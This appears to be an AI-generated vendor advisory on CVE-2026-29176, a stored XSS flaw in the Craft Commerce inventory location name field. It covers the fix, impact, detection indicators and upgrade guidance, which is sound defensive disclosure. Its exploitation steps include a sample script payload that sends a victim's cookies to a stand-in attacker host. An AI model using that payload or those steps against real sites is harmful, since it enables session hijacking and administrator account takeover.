CVE-2026-29176: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-29176 is a stored Cross-Site Scripting (XSS) vulnerability in Craft Commerce, an ecommerce plugin for Craft CMS. The flaw exists in the Commerce Settings - Inventory Locations page, where the Name field is rendered without proper HTML escaping, allowing an authenticated attacker to inject and persist arbitrary JavaScript. The vulnerability affects Craft Commerce versions 5.0.0 through 5.5.2 (and reportedly 4.0.0 through 4.10.2 per ENISA data), and was disclosed on March 9, 2026. It carries a CVSS v3.1 base score of 4.8 (Medium) (GitHub Advisory).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically in src/fieldlayoutelements/PurchasableStockField.php, where the inventory location name was rendered directly via $inventoryLevel->getInventoryLocation()->name without HTML encoding. The fix replaced this with Html::encode($inventoryLevel->getInventoryLocation()->getUiLabel()), ensuring output is properly escaped (Fix Commit). Exploitation requires the attacker to have control panel access with permission to manage inventory locations; the payload is stored in the database and triggers when any administrator or user with product editing permissions views or creates a variant product, causing the injected JavaScript to execute in their browser (GitHub Advisory).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of higher-privileged users, including administrators. Potential consequences include session hijacking, credential theft, account takeover (e.g., by forcing a password change), privilege escalation, creation of unauthorized admin accounts, and database exfiltration. Availability is not directly impacted, but the integrity and confidentiality of the Craft CMS administrative environment are at significant risk (GitHub Advisory).

Exploitability

No confirmed in-the-wild exploitation has been observed, and no weaponized exploit code is publicly available — the GitHub Advisory page referenced as a proof-of-concept contains only informational content (GitHub Advisory). The EPSS score is approximately 0.01% (1st percentile), indicating a very low probability of near-term exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires authenticated access with specific permissions (control panel access and the ability to manage inventory locations), which limits the attacker pool.

Exploitation steps

  1. Gain access: Obtain credentials for a Craft CMS control panel account with permissions to access Craft Commerce and manage inventory locations.
  2. Navigate to Inventory Locations: Log in to the control panel and navigate to Commerce → Settings → Inventory Locations.
  3. Inject XSS payload: Create or edit an inventory location and set the Name field to a JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>).
  4. Save the location: Save the malicious inventory location, persisting the payload in the database.
  5. Wait for victim interaction: When an administrator or user with product editing permissions navigates to Commerce → Products and creates or edits a variant product, the Inventory Location table renders the unsanitized name, triggering JavaScript execution in the victim's browser.
  6. Harvest results: Collect session cookies, credentials, or perform further actions (e.g., account takeover, privilege escalation) using the captured data (GitHub Advisory).

Indicators of compromise

  • Logs: Craft CMS access logs showing POST requests to the Inventory Locations settings endpoint containing HTML/JavaScript tags (e.g., <script>, onerror=, javascript:) in the name parameter.
  • Database: Inventory location records in the database with Name fields containing HTML tags or JavaScript payloads (e.g., <script>, <img src=x onerror=...>).
  • Network: Outbound HTTP requests from administrator browsers to unexpected external domains shortly after accessing the Commerce → Products variant editing page, potentially carrying cookie or session data in query parameters.
  • Logs: Web server or application logs showing unusual GET requests to external attacker-controlled URLs originating from the Craft CMS admin panel context.

Mitigation and workarounds

Upgrade Craft Commerce to version 5.5.3 or later, which sanitizes the inventory location name field using Html::encode() before rendering in the Track Inventory table (Fix Commit). As interim mitigations, restrict the "Manage inventory locations" permission to only highly trusted users, and implement a strict Content Security Policy (CSP) header to limit the impact of any XSS execution. Regularly audit inventory location names for suspicious content as an additional detection measure (GitHub Advisory).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management